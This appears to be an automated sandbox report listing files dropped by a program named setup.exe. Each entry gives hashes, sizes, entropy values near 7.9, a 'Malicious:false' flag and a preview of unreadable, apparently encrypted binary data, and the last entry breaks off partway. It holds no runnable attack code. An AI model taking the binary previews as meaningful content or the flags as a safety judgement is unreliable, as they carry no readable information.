              SHA-256:9D7C2E4182470FABA2CA3BC3282A23B3252F30B502EEBFDC8A844E1D5AF748D3
              SHA-512:2168D8C3DAE9B3B16514F8FBCEF78636C2CB5720E2024EEEC109C58BD72FF722F1F6345862EF3BA04F3ECAA67F3FBBD7D7B255B1F2EA0EE87EAB715E909C75E4
              Malicious:false
              Preview:.<?(.N.x...h....H...I........F..l.Q..........b..g...Aq@.#lIt.(F....6\.....j.gX.:.....bj.l-.Ygh..).09N`. ..A<$?N...y.).Z.....R.+....^.z..+. .....3..+.F.BL`.;..>.P....jN.H/......w..d.t.Xc.o....K.RP...=@......L.$................%b..Q........rR...O.y...7.A...3.g.:.7[..s.\>...".8.Y=...%.......a..H..v..I.:.s}..'...4.....].j!...A...@.t..?.t.MT......%..}.:.=.>_ ..)....T..w..l..:.$...K.]._W..!R..$k.d....x...`kA....K-.O..........P..2.v....Q0~....;.....0\..aZF4....2D..vh.2...M....`C...X...~.....S........n...Z...m.....j....rg.....S.i.dx.XY.....x..&sz......)..M...%F....\<.'....V7.%.3......1....Z3"-' s...q..........?.A....b....D.......(f.A7^.6iYp........M.Z.e.l.;P....i..L(u.%.$....!...<?..)o}4...0..G....+............c.P......r..<...R..1<"....$......=E...*...*=..@..Vz.e...U...C.o...3..Njuc.. .p........5...Og....L.Dz....B...z#.%..^...I.....QV.F.$E5....nK.........A..q...\..~O..C...41..N1.....w.%..M.y...........(.7.o+b..T..u.$.\L.....h.......?.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1712
              Entropy (8bit):7.889890180723079
              Encrypted:false
              SSDEEP:48:LHnJftX8gic0ZSIQZzI9mci+BPoVQ6s93gaZ7j+D:LHrXdK5QZamCPoVzs93gaZXG
              MD5:BBAB58D42E075F4F8654F90F9446FF56
              SHA1:30597D4C378B80F67C72B86FCD3B9FC5FE1240CC
              SHA-256:34E9EBC29ACC8EF84A29FEFEA53B3D10C07233C3CFFA92F37DDA7ECCF3400C6C
              SHA-512:07470CC25CEB545C2D48A791F461828CB185AC17E2C2423DCD56DFBBB8D7E6697E6489D971F46F70FE00B3DA3DE34788123CAC0AE780722D8ED03A46C6CBF925
              Malicious:false
              Preview:.<?....).....A.................ZPpT.1KR..fB..h<.&.......m^'.rK"`......\%<.i.e.y............~.h.".!.w.$..8..."...j..-..P...H41....'.up....%.e9.<...f.!.Dl?......yU.73Jl.Y9(..k.G..I...`W3.eOh%*..P.J_8.,...lH7=....X..... ..J..$2.].ZN...5z;....n..j.....F.?......t\u.3........\....@.9....;J%.|P%c.......>.....5......2..r].....G....l....T...!.u\.)....>.AG~(..q..;..J....=.C.e;.v.s..$..{.]qJ......!.....w.y.rI..X;H...d.]..a........>%ON.P.m$...,...-.).27~...h.EL.W...t.....i.......T7Pn......I.q..@n......n.V...r.5].`.T..u.r.W..:.;.b.f.?..j.] 4Dr@..n....^......{>&(.....:../%"..p.T.P..h.Q.6..0..JC..wnu.... ;.sM..K.)."..!..A.:hNJ.LUW...e^...c.u../X..!.....H.....w.[1^7.q.).h..$.....z..sU...R...5.....M.)...n..W...,"..8..0..g..Q2.j..=......@..3.w:$.&.A...H...mDLJ..?Oj.?.r1...x.....b..#].#. a!Y<.^%.g.....3.t..)3eD[.W.c_.q..g.~DE..K^...|.y(.!q.....".K.B.....M..9...Y.wxN...~yL./*C-n........D.R........G.....$25D.&.......T...T..k..$.....q.gU.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1749
              Entropy (8bit):7.888397221953937
              Encrypted:false
              SSDEEP:48:jNbzKHlDjgJlVmCzlL6vORLHGQWr65CzJGxn0D:jNHKoEMLmM8zJGxg
              MD5:309E09B1F6082FD5AF1B1C154067FDE4
              SHA1:B179622D74BFAA25ACDEB81103A50A0975D9CC71
              SHA-256:6213B6F8FF5879E584CF9286EB6A5F9C6D3A78610B4219493E9D53CEC0E82A24
              SHA-512:53B326511878CC3A7D2AD4AE541C0FDF544877323981824F98307A5BDC3975D006D6710EE3C3D95161470206A662E08D931528EEC5F6ED73633D42AEBC31D5BB
              Malicious:false
              Preview:.<?..&YMP.....H......%6]F".4C..y....>P..>.9..e...Fw..E..;)-%...*T...}..Z..0h ..hV~V.o.v2&z......c.v$..dxF<.._...x.....F.D.....<.r,....#.d%+b....>.....6.;[S........i..|.z].$G..-...........w......w/Af..f...Z._...-.:.y.......h....cI.#.....S...c.8.5...V.`V...pR....p.....4SB./i..8]'=. \....e~p.....u@bk.......h.rMI.V !.Z.@..+..}`.1u/.9.h....[.d......yy_'......,,.S.0.....~P5.9.O.6...0.....1..;{......ym..#.Qx..sxdUq.u..DA].w....K..+....$R.kn/.6...B........<...2.D......Xf..X..{qB2.O.s..}......5........[.ei.k[$..K..:v4.".....F....+..r...2....d.f.3~h.O....J.&...]}G...PB..Rz#..B.~.s...tvqR.....}..z?[..l..'....kk...>B..-.r.B...V@..?....]..U..(Q...o..... .A.LG.....k.3..A.0.........'l._E.q.....X~....{....a.........i...F1..MZZ.7....%..........,.u..F.i..nBl...'..".k.z=...z#C.(+'...f.^...1......@.w.&.......3.].l.N.1...#.L..[.S1A.;.d:i,b.D.jw^...[.w..R..0.......2.:..S*..f.;.....gy...k.wf2A...uR..D@.....H.xu....E..|.........16..8..;.8<..>...!...6....2."e.W.\
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1734
              Entropy (8bit):7.887385159061523
              Encrypted:false
              SSDEEP:48:sN9CX12w4UoSGZPMfsv9QYoPel0KGI1hD:sNkX4/ZUfi9QYge3GIL
              MD5:A310044DDEECCD62CDDD16C6B5B50F68
              SHA1:6023C1668B8696EF4596100A9C05ABABF8FD0F86
              SHA-256:10CD44DFFAB06D0A97381CB1EA3BCA2774A952ED1F5F4D395E53706B62E9018F
              SHA-512:3B4A78AC21A5FDDC78080D3E036AAE344EF3197AE8DC4EA70248EBA363DC4493936ACDF639FDD46DAFC0933B1F99AB58F4FBC8C1CAF6063F9DDD0E74C87D9732
              Malicious:false
              Preview:.<?0.e.b.Yv.~...fe..\<..g.~L....Qj........G...).....2.J..|...pP.J......IT.;S..P.:.....z....e....P.....q.a|D[......A.ENzc...C,...M.u..[iF..ux.... .r.......:.?..F....v]nb.j.:qs....V.(..B.8}..$.qm.....-..Q.......N.......*}...A#6.N..Y......q.W?..\......:.....p8.4........4{P.lH1-.9N...).....X4..[..TY...'6.#..H..Js;....&\..X..{.|.6...4y.h.T..B..E..[.....@9.s...MlHkz.W._=..V....o4n..K..1.Q......?<gX..w'......iE....h..Q.u.....onD......3._.~K.W;.Jf..;. ..Ui...t".....<..q...bj.r.y'h...rK.F.S.J..~._......sTL......k...\.._.R....b.R..%...72RI..d.b...n.=R.S......+y...<...+..n\d_...:....d..'.e.s......(..|t....S..]...l.8...b.......X#.}.g.<.[;......;{.O..BP..b...D.,..:..8........Ua&....4)-...S........?+$..KG".....n.b..{n.T..3N..`...(....~..3..B..[......5)..[.....Y....hJ.wE..|...rz.Cj...o~[..$.L./mMh...cp..w.N...1....*.4[..0p....-t.Nc..;.,c.w...#..Q-{ZF.:3h.X.OE...<!.[]......\.io...Z....Nv.].x.C..d..4DcAX....`.1....\l.:vj..N.VU..V.x..(..o`x.e.....\EFo.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1771
              Entropy (8bit):7.870820874184448
              Encrypted:false
              SSDEEP:24:z3Z2rTl/EuSKh0vJJppfz3P4FMyAgD5sm2AfQZtmc2Mc0wjBx4GqsL7NT4xsSw2I:z34FT0lpfzIVACiA4ftw9uGr7UwD/zD
              MD5:2E64A1835633A2359C0C07240B04C513
              SHA1:80D687EA076C84264767533F17E9B24CBC9D2E5B
              SHA-256:6FF3B6BAC3851BC83AE09BA2CEDB7277C6488886A7415B51331166928A5990F9
              SHA-512:87040DDB57EBFAE24B0BECD616B8909B85F830A3B167A508981A4361F79B12B9C87689320E9BAB558E5051C74B7C2EE83991B0A66F5579B22E5A6D289918738F
              Malicious:false
              Preview:.<?.......A..2..SK."V~./.....e *..1.o.......i....'i..T...X>J...W?.N.#w......)....w..{.50.=7P..q..X.H.T'......].V..E...V..N...nH.H....<.n.....#..#F...QM..?.s...D.9fS....:...s.I......e..r8s^.5.o..,..O.....[..LH...k^gl.9UW"]]9..Bp.l...o.@G#m..G2.........x..F.....0UJ..s.........enE...x.R.5.)sY..............Kf...ipZ3...7.E.|5...gn....@....9.eM..w.N.....@.....V...F.4.|N^........]-...|sCz.....VE.S.....^.g.....wi...3.,.3.."...../Q.D..C.).....+4.(N....R......^...SY.}4..8.........NW...9........-Y$..C/..4..Z...W.k.6.........!c=.L..{.D.n..A..}y...U...P.'.O.CL.....hp.._...m.8.Bq.|.(..a.(..7.....#.m...|.Wb.\.&.............#..v.g...n2.......;....7.1.JV...N+.iS... ..}.g9,.`....R.._8f.Y/<.. .*..Dp4.Y;....i..M.pbSB.%"zU)f..&..b{I,..*%.U*..[......{{h..s.....W...6../....L/.]{..... ....k;(.f1..=..Yx..=.%@P9..,....x..F,'CB!g..3.p.l.....n|....FW.G.z*.d.......!5.!d....#.g.?..(.(..+|.h.|....u..8T*..+.'"...Y.L8qI.^a...j%,`..C......NZ.;....\..O..a...
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1716
              Entropy (8bit):7.8926756287657724
              Encrypted:false
              SSDEEP:48:mr/E1Xh/1ChAQGSBJNP01bGhZZFLiBPPDype47UnDlW9hw8D:kACqYB3MghZZFeBXDypeVn0g4
              MD5:46106B21EB7B06A5D970FCDBB9D8FF48
              SHA1:A611A1C17C070684C47E830055D61171B4EFFD6F
              SHA-256:1107A96293720A313C8C5B961B15CA13AA1C54B984138A4FE35B5B251452A5CD
              SHA-512:E18DDDE461A66CEE40A0F0CF5FAA6CA66462393CE7D6CA312FABCA1B195B66B084EB4A96EC747B3F693C61D22ED450D2CB5AC3263187FF01B90AE7F223856BB2
              Malicious:false
              Preview:.<?.Jp..[DW.|...m...!8..NL..w.6..sG...!i2(.~..y...!.z.}ieh..7.,..2....3.,....~.'....jKy|[uIP..u'..Q.....G).*..T.u.\90.'..n..hB.l...]8........'.[...\.Zy..x.6..x.B...im.J....f.h.@.......?...U2@....%i..St.g.D....P......W..}@.<..6.KU...#..E..~...6[..&.y.T/......P...L:K!.>1...@i......J3..w..>wE.:.(c.y2w..C...W..+ie.......i.5..kAuS....A....c.}..y..y...HB..!...L*E.n./.R..Q.VH.=...S...P....]...~?.4..t.D..I.^.)_%....;S.b...#.]...n3.*..}...O..x..>T...[`F.&.j..2q/.r.zT.7x.P.. .....Y.^Eo.|...j{~4...JJ/.9..X&.A...0K........;...!....OVX.$.f..)..~..V..|....:.U......f]...X..).w..g....%"..P\.:...4u..*.o......@..N..A/................I..?.^..`L&.......r=:...n..c..<.m'.O.'.....P.l6Ce."./TJ....=-..YM\U2...s.b..Q...>..|Sl.ro .Z.bY8.xJ..;Q..Y...9f8....]q.......E.~]..S.^.....HT...k.I..2.R`......1..5..1..m.;"5.{%k....,.....`..D5..`H..gN...h:....lJZf....er_..e\/..'.....D9..d!...~._wu,.Yw{..p..4.........zU..2.*d...e...<..'.n..dg..[n..8\...O.O...s..=.?v...6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1753
              Entropy (8bit):7.886888502406109
              Encrypted:false
              SSDEEP:48:rziHyC9qI7dZlgKvC/QAUgqS20zG+Yeigk1D:rEyWrCLdqSTBYXBN
              MD5:E4F7727C3E75B577B6B4CB134FAC1AC6
              SHA1:50772BF75EF7B478F52FD830A703F762B8EE95B3
              SHA-256:9502E2AEB4C38B955FBC33F0ACE9F472B9A466BE91FE7882430C333DC9FE1B7C
              SHA-512:485888DFBBE1B7622C06BC88DBE2C9F83F0C14842BE968E2452568097EC3073661B27416A60B355A263E6467483C99A8D798D646219C17D9DCB79763C512E00D
              Malicious:false
              Preview:.<?J.;.*Z.HU.JO. .k....o..[.`REI...<....gl.-r...`:&.L:..t.1$........*...&COf!..a]._..$.......-.W4.y.].L..Hcs+}.........@..[/..7.kJ....B.&...|.<>...m..8<xZ....U.$.P....Z..........^D..>E....V$B9j.....b...f.PS..?*......q.e4(/:.((c...6\.2...l......G..R}.C.#8...G..-.5..@.N..Jg.@z.@..X.....u.--+....6.z.08mM.M.&C..q.6mrl....4..a{.U(.:~.N...Z..;d.Af....x%.......r.u..6c....{O/.l.+..y.o.]t..%'.........P.8.p..!.7`.18~j.,k..[.a.h3...j..^?s...5...8......Yn.I.z^&.wt.y]r.Tv..........[.s.~../..HM&.f..<.&.!.OuD....H....G..W....F....3d..?.96....Q@..j= .....Q....".Q....".`....~..dcsuqg.....d@.oT.q...T..]..K..4...Q..h....-...Js...T..7....g..'....m.x.......Lv.T.Ta.~)M..k....T.@.&.bM9m..'Cu..3X.u..C)mm.........g..J.X"...~6uJYb}.c6.r.%.X).t...q..Kh.]..dR...jNU..~%e..*A.0Q.1;....sm...kLk.._..........t...yO.;*.6....\...*..-i.7..c..4.....j}..u..01+...v.....PA...S..z...:.t........*..,..K.p0.0.~5.,.B])K.o'e?w....."..P).r.m:^M.......xTc..6...2..0..1t..._.U....
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1739
              Entropy (8bit):7.88635006957226
              Encrypted:false
              SSDEEP:48:y5hlH8EbN53/ohK5JKslzTxdko9iHH0+vcQjeKD:y5hlH+AjpTxKo94U+XeC
              MD5:47D708DB71B3B031B865C44A9DEBD5F5
              SHA1:2E0577316C8A107E7F22ADBC92DD2FA78AAD83A4
              SHA-256:E0C3F95D301FFAE6559202782142721BFD731E6192CCFAE86F06A120554B960E
              SHA-512:BEB6433AF8693FFE8FE391E707D1E780B8FEAB2D2D59A97EAC68F227E6A8E3B6A4EAB553DEED56E8A3DE6AE53B48413BDA61606658B814104319CD2FC211BEBA
              Malicious:false
              Preview:.<?C.....g...........{Q.C=U.|-/m<A..-..F......:n..$.r?.X&P..}|...3...*.X..SOh..=.3r.....q....D=rE.}c....\8.....[._....m...?.).9;..D.yK.....Q...[C.5..kJ..;p.O9..i...j...e...=)e.$e;....O..rj..5.7.&.>k..I.(.0..H,.(&..&q.#hh.85..WI.t{.......W.V.....O....h..NX............,......fl.B9M.b8..=.9.a%.....K.G.N..x...i.L.>...........2B.I.,.`|s.....t...:.v/#(.1..y..Mg....)hk%...M.f....N.....C......#SHMN.1.. o.=.}...KZ..2SW....W.,G.m.6"........(...C2...X.asy....z.C!{...M..#_b...jv....j.b.......8..S...Y.P...".G./......U...$.7.K.s.eAh}x.&).(........K.1........W....6.,.b5.(..{.4.L....1....l.!...h....*#...i...kz2.N.f.\:.....~...+|..<...{{S.|w.p7.J.K..q..p..-....X.n... .B.Ldax_....L.Wq.s3.."...0U...#F.uC.6..,...i..yf.x=E.....a.y....[.M z...>.....LT.!=...8Eo.+..tm].`0..ko.....&:5:...f...L^ .(....ab.%Y....-.f....%l9.h....a.8`.+.+9...Y.._&.zV..1.........'Z....!,..1.19..t.....E.dq.....(|2.g.4.e...>..v.U..[..R../x....Mc...Y@..oA.p.5:....bur.....!..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1776
              Entropy (8bit):7.8794317217768635
              Encrypted:false
              SSDEEP:48:XqZFDxPws1+hAU3f15Af/pc3kYnBKbGQE+0CnyZH4D:a7xIsSAU3f1K3O0YnB8G6pYk
              MD5:9FE5FC6A671B45C3FC4395A4D42A6729
              SHA1:51D21D895BD4736CDD5909CFFD86FD77473EEDD3
              SHA-256:8532BDC8A33A0D0901FE752CBD0160CF9D28733270B6B53D1216B5D906EBE996
              SHA-512:24097DBB299994BA42A52E872C5BD3499F975F6DF754E068AA7847DC96C18166063898F1E50AB242BBFA95A3BB0AF1C6A74D413BD5533B55631EF9FC4616289C
              Malicious:false
              Preview:.<?...spg.(]8H?LVOb...5..{w..Ar...m..'.N.....R.jQ,4....'V....02.....~_.1.j...#e....h.T.......%.*U..n..!..z.B.59..d6....,.3.~.e.S...[..$...aP._Q...E....._+...NlQb.y....qV.....47S...II5....x$.}.d......8+;(....`N....9..J..B.e<..0.#c.'IP/i.GXJ......B..x..~.../.j.M....nr..r....b..6..2..X...<OQ.E..U...Q...4.t.t.*<w..ow..(..\|.}.....cO..M8.f............v7......bc#V..TF.?..f.._..l..........`.`d.A.F....@s.[OC.#Am.>:p.Y...p.d.l3....&E.u.L.E.....Y..1J.mA.. -<......t.N.jf\g#v....A.#D.})......B.5+qj..*.....@.r.|.8..X....~........'....k.........._.[A...z.\%.D.&...b........Ib"..6r.H.._f..N.2.A.....r..\<.<..*.6R^..6s%...l.y\-........x...K.vl......7..(...=........O0..dvi.....i..b6.5.....0.w.k.X+...`.2c....*..Bxr..T...B..........]Y....E.&.....iE.......[A.Z&.@.z.<....5...\..Ha..^./...ik.G8I....b.n#.\.......e..c#.*gx4.u...N.L...#P..x]...q....R.H..G.J......08d.h).....*E{...i..BQ.c.......A....,4.....f......,.b..|...)..{.../....^._rp.).....u...r.1V.E.......$~.E
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1724
              Entropy (8bit):7.869158579627533
              Encrypted:false
              SSDEEP:48:gNs50um3muweu56dm3PWlUxxcgIx3ZL+OTWd2+83D:gPweSESCdjLN+8z
              MD5:0D549B67D682EA15CC5554026B6062CA
              SHA1:CC9EB48EE0AD5534E337CBC31809A3028A454072
              SHA-256:273F4E2CE54640CD7E22FDD10E9014DA6D1AE13A8218C5271A73FB27871FA217
              SHA-512:CDE6ABB563E69AD734A159BCB383592B12683E2D6AD2E6B24A8454430708723F1B5DA5A86E625B5A63C5D589EE895C16136F94D3EAF9B3A9A7F28306DBBEEEA8
              Malicious:false
              Preview:.<?L.......j..*^..\R..?....8...0\.K...d.....%>;.A....7.h$+.d...?.+.a...v..}`... CJT...^.9n...t(..2.Z..K.5...K..7.....0.N.+.. ..Od8..IF.^O......@.77L.....o.5..>....>:.E..e..4R.......4.t...!...2.\...Eas...b..9.ZS...........-.R...";..[i.S...J.Q...6...4.N%dS....8......-U|.R.!...0..r..E.g.......v.D.p.].I..a..)@.~U...{.Wx:.(P, ..?;t...W..}.M.#....?....z.X\i(,...Nz9=..<.kg..9'...N.$......n....C...&....I2.B]\g...{..8.....>..A.4.@9d.8.C|j. Q6(.P...#y.aBpY_.Xr..-..M.#cd.>C&.6.1...,.R.rm.-.....2bK.-.zc....{.0.L.......-.C../.,. s!...\*.TX....6..[@...k.z....0.D..}F..L.k........w u`@....#.&.B.9.....J..{.)...O.....'y..d7.h{+Q..r.(.......E..z....E.I#._.ha=.......F...f.[D.p.7.&.^..$.{...C!H...........06.-.....}..>..XP....<qj.d].*..E.~o.Q:.7.%..4...v.j.h...yZw.toE.G{.?N..<..sk.....(...GqWg........s..Q....g~.t.. Yu...5.._..h...........uY.....`..u.sF....3[./!.k0..2....].R~.......*~.~.xzL...`t...J.^.p..R...y....y3.;...o8..}Z.W.96"`....CQh1R
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1761
              Entropy (8bit):7.874277807175005
              Encrypted:false
              SSDEEP:48:A71/y7oD0LiMtNibU4QCsLsSIG35IPE/X3D:K/4vviXdsgkPz
              MD5:82A9388083C7449E4C769C9085B7F267
              SHA1:7097798AF5C5E1437015068358CBF846F771B09B
              SHA-256:8E42E4E40E7A83B9AF1A7EE0625A7F2F004C03BBDD04CE59E5E128DE46A9C692
              SHA-512:CDD4B198F53B0B39C1006E7590F852A7B97CED014BA1113D6DA0A13D2467BFA1396CCD51FA0D81CDE7D6868043C07F46350E81EF551148063C4199959026AE90
              Malicious:false
              Preview:.<?[Gg'%......p%...kg....G.Dg...o.T'8..$..O..iy\vqI.D.,a.n.`...p.....N..$.....9-z.uM.Q.n.U....Z........z.<..F..2........+..b..Of..>....?...R..c..#..b\.:..PN.L..y..O-..`......a!..i.g.FH.. .R`.s...Z..q.+.V..kg*...%l.$.r..s.....g.y.[9[.....0.......%d...mL.k.6c.*./.B....,W.P...z.-..^2m._...L....L.<.*.-...U....[.....?b.?+..!..^;.A@......I>r......I.. A,.[..m>.....?|g.p..=...;...,8zy..}y.:*(.@...g..o..8...`SC.C...knc$4...0C.;...*...3.1.#.B....&.......'.?H+.U..Z.6ij......V...H..7.FZg....\.;t..g..w.Rw7e.....W.Jfct.[....E..a~....A.h.gfMy.T.?h.T.|{...<.&j.ftoT..y.P._..4c...~.....%;:.T...:i*.M{...)3....+T...../0*tE..R5........+..6.{......a.utI....`.L...0#.7._...._..O.'.[..?k]?lo!..l.R...().h...B?.H.i.t.I.....Y.g..x..y.'8...!....rH.;.X.8.......K.H..?n.6....z.z.."....t.^....(.6.Fq...+.xb.!.H.G..1&......s.b.k#V#:......^.....h......q..T(..JY..?x.`."[....H...^.,o..R0..de..g:....cTt+../.y. =+..;.g..A.HT..C...z.7>e.l(W."I.8.%....mM.x ..@:..0(._. ..;0.9..I
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1700
              Entropy (8bit):7.894255325731018
              Encrypted:false
              SSDEEP:24:7g1iqDETdIDEDqM7vZL0aFSy3rfeCGWp/2ymVZ0EeuUYtHnD/q5jDnuuObD:013+dIDEDjN0+Nrfeq+pZigDC5jDuusD
              MD5:61BACD18E746891E006111E094F141F2
              SHA1:02778110793DCA1C19FA9DD2F0235748189437E3
              SHA-256:8419DB90D27630983FB655FE27E59BECD90988B53760FC6E8B4734EE504266B1
              SHA-512:411B6E269C71D7A7BC522EF0C79E08A79598DB29882DFF37F0774B1E85B0741F97EB5979D1F0648C6898EB140A628ED317D76DF9BF22AD7C5E37C3E05718EADA
              Malicious:false
              Preview:.<?WL..j..w..~...wG..Y..(..E..........@..dhBl>....ZM.._....[..(..l(....U.....X..`N~.......I....Q\S."....7E=.r....].....)..B.B...7. g.J.3.u-...w.D.U\...t.I..)....~.~F]4*.....+@.T...../..u.........tD.P...n..#...Z..b.H.5Dd.@...../:.?...r.l..Z. L...Cl.o$.. ."t..a...e-.An`<k?.--aq.4...vuC,.Bl...9..9.|.Q.....!.XU.v.*.qH@... }.`rV.s.!x....~#...9j.3-......}+O....tI...~..O.w..BS.O..'.....LS..J....FU.K.....us....1/D.."..5......S....:..=.G.h}g'b...h..q.....K...,..<,n-x.i@...........d..\ecl.oA.T.VF.p.....7.....:...3.4JFu..4>..WHDqt..U..D......B!.&....s...f..OTbj.54..$....&p...t(JH.1Q..eD.n.M..n.`...3..X.jM..K./ [........./..Ew.....:"%*TPF...b.o..a.b#3y...4u{"#.Mw.......2.;._......_..........1G4*..q.........P{Q=4.-...s...B..Ky...xJY.D].._...T.._.T?.p..X9...h...SJ.I..1..2.f4M..Ga.....A$8.}.j.........1wr\.b}r."`..E.<..'Z.38]...."&..gR...)Bo..+\.z%..\......Z....Y...a.D.....>......+Nd.tT0.y..0M.*.#.F,.[.....h..n..g....S.L'..-.T........O......eFY...z$=z
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1737
              Entropy (8bit):7.890556472899714
              Encrypted:false
              SSDEEP:48:FO45OtCx319eJbsEXu/Jo38WQy3BXTFtWuHLJyOD:Fz5mCv5mu/63ay3tpAYd
              MD5:120D76B03AB5884A93078721A6000BB7
              SHA1:1A1651D2D7CDCBDB2765AFF219C7FA66665311FF
              SHA-256:297BF016FFC13BE787665433FEA88E41BB432DFC0D5A550A68978115B6CDD8CB
              SHA-512:00C1F35D0E15A6C5BCB7A5FBEF6A40207CE544ACF5CB9545BAB05D9D08AD420BD0AEA195B9331BDC351AE26F9778738768C139292295500B314E0E920CD31DD3
              Malicious:false
              Preview:.<?.r...8[..3K2,....Q.n:..;-bnW....N.r.M.+...2;.".I8U.-.l...*.g..D.....}..........uA...X..:.1.......2}...5.:.I.......4....'E6.i[Q<.oD....l(..?.q....cA!z\...E~......K...M...qs.J6Q~.v.m.......t.N.0.(.w.U.L.....H..........?Z_2y.t.T2..p..Q....x...$z.P.bF...jt....2[..*.Q:....z.Xc.Tq......T|..`._..|m.I^E*$M>.G.....C...wF...{..1...............Zw*y..#p.wO...st.^C.D..(.....5.1......\...5W.G.u.....T.......sO#.7.}.....n?..3.....EY.P.9...c.....#..:F...r......f.y].g.},(....F8T.}E..J.Y%j....V/.......|....M.:..@..1...`..x.............{..l.{.).o...t.....k.._..Z..?mG.....@....w! Y...X.o..T+.;:.dLQj.........S.(..z..c.5..<._.\....G<p{.@.y>k....\..^.(fV...MhG..P[.m....;_w^.mp..L.......$.|.r....p....:X*.D..$h5%.+.-E/Zc.e+@.H_+.7.U.D........;|.:../T........@.qr..1....f...p.lD.';Ad.M(...&@@..w9...=.....KF.o.K...=j..A.9...7........:l<jx..V....C.k.H....5..n.?Z...A.9#..g....+.9.:... ..{...$....J..5.6..F.%......... ......i.....v8..*.8.f*<..'w.........d..Ve.7.*(L
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1716
              Entropy (8bit):7.891742031793029
              Encrypted:false
              SSDEEP:48:oKXdJZpi9MFwwiJ7xLj6wEhGotlv2DGglB4JVxKmMD:9NJZpyMF1e7doXvAll6+
              MD5:0F9EDDA364DACE77D41AA30ED249659B
              SHA1:34143778782EDA545D49C0640471B4790D45FFEA
              SHA-256:9FDFF3214CDCF9F1AF329DF0FF2ECED5F369E66693AB3B10A7B3D3E2B018C6C1
              SHA-512:B555EFB951B9D4EA8B4132C556FB0834871A7A6491EA3F2D3B3E8C6CD9A49884E37F74317BC1BF5D235D65A87F99C6CAD418B948820FB4A7613D4E81ACBD9738
              Malicious:false
              Preview:.<?...S6"O.....*..A.bn..#!n....).GB,#.X...%...^8.`@.1...-...6.r...D.y`....@m.V..zvb..h.....?.3.1.:........_1.E......4..I."dK<L......t.....p?...g....[.....)....[...S_..\H*lSR..W.W.~1.Nl...[K..R.N6.y..@.I........>/...0..\...ik@.=.U#`-"3...l.G?8.y...!..|..n.Zie!.#.........Y...}^......6W...)...B#.}.I.8.uI.......+'....T.......%.&..z...7...M..)Kz_.F..U.t*..E....k9`M......x...`J.g.dk.s....8.j?j}(b...0Z./......-.Z.^.(......ST....SCg@..<.d.r...&..mPm.M...l.7.W .:.......s.R...c..C.6R.(.\.....~J{........l..|6.m..E .c..W<.$Y`u....A.}...e..z.+,sM......T...`rU.q;..G^.2..)..5..1C..e..^..h.yc.].i66V.$}g..x]....;o....n.:.....U....Z~t.g...u..B-[a@f....h.F.o..6...4.....^O...Y....3$...*=....O...%...,.1.n\...!P.ji.!l.....[Ed..o=..!zt.2`V...o.?..HgS.....#...<..|..\._....-.u.......,....@..)V.?..w....~..~X.A68.>.x..D...c75..7.4.e.c.q6.?,.Q+H.....z....Y-...q.....gQ.V..+.`..*jjF..d...HO!.......}i.D.!6u.......U.t..."a.M..I...b<.....tU..&..T..6LN<.....W.c+.0.j.F.a.U
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1753
              Entropy (8bit):7.8908066055661115
              Encrypted:false
              SSDEEP:48:YPeNvGPLujlFpRSXMl8sgPqwr1ocW9qVHJpH1QlCdzD:YGJWq/l8sgPqeiqVYIf
              MD5:D8BC0A817C6AF73FE241BBBA40608D9E
              SHA1:408EEFBC144C6454CE2EDDC4EA7A8DFD22FECF60
              SHA-256:0BF1E5B25DFEA192C31D2418EE4B21D03664135D0E334B1A0269ACCC52B5695A
              SHA-512:4A684D6234970943650B9BD2029459E96A36E2CDBCE223645364E4FB52DBFB347B7EBD468052618EB6EE748AD0F71731411DD5B6439B553545955570F167EA5D
              Malicious:false
              Preview:.<?;..dC.(.Z./%W.+..A.|.G.($....+...h.y..n.....r.'.(+.l....q...K..=S.!.W...@E..)....c....qv|.n..W.....].p|.q."..........j.}J7...>.....6E....)H....d.K/..LVg..kt..P!.N..{..Go.xfk...Y.}...U...{ .I.i...L..... .<.)L......N...A..e..OW..:X...C{.4.j>..t.4..E6....qm.9...^....F.[.bs1!A..P..>...9....Su.b.....3B...7...._g.vx..1..w..j..!...A..4.j@...&L..^.'...F..e..Lg(.K....QE_.@..5:<0.X..)..AG......7....w?...4...);:....).3.s..K...O..YV"..b..P.]...>|&.L~(.9<,..4.zu..g.......>.c1D......}:..[.S.......?r.<.3..a....&..O...]....N..R..>..#;.&-..bV.m A+...0.?'....t.i..I<..`].5G..|l<b.......!......@bX..\..I?..1R..JK.i.....~...t..)....)RRi.2r.....;xG...3..x..>^.sI..} =.[.:I....{\vo?..A5...l..(....G<...m= .'..#.(...r.&.B.._..XI.8...~.#p.gC......3u...F\.mg..k........L.P~p<.8.,+..q....+F.d*y$G.D..........Y9._R..{...@.........90%.>K...._[..t.#=q..By.L.e.hE..;h...%.*.=.94 .............Q..."?;..T....7%.J.*n.V?..L.n...1...EV;.....g.@3..$.i.q.....BT..4&...<.h$.n...5
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1690
              Entropy (8bit):7.878752540982734
              Encrypted:false
              SSDEEP:48:WAW4/1s6/6PwTukjUzMH0pKmjZ5kpOpcAwAMo5D:E4/u6yPwC7MlmjZ09l0
              MD5:1AB4072CF8E458E7D1AD47770850BAAD
              SHA1:AFFAE0365FDF33270F146D58F11E26A6EF0E05E3
              SHA-256:788B223831A0153E7879363272D7A11AB7FB1D963F3AF8CAFCCB6A194CB26548
